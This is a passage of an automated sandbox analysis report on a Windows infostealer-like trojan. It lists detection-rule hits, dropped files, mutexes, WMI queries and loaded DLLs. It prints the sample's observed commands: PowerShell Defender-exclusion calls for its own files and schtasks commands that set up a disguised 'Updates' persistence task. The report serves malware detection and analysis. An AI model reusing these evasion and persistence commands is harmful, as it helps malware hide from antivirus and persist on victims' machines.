                      Source: kAsh3nmsgs.exeBinary or memory string: OriginalFilenametkXU.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: kAsh3nmsgs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: HHhSyZN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@2/2
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile created: C:\Users\user\AppData\Roaming\HHhSyZN.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMutant created: \Sessions\1\BaseNamedObjects\ySytCl
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4794.tmpJump to behavior
                      Source: kAsh3nmsgs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: kAsh3nmsgs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: kAsh3nmsgs.exeReversingLabs: Detection: 79%
                      Source: kAsh3nmsgs.exeVirustotal: Detection: 61%
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeFile read: C:\Users\user\Desktop\kAsh3nmsgs.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\HHhSyZN.exe C:\Users\user\AppData\Roaming\HHhSyZN.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Users\user\AppData\Roaming\HHhSyZN.exe "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Users\user\AppData\Roaming\HHhSyZN.exe "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeSection loaded: kernel.appcore.dllJump to behavior
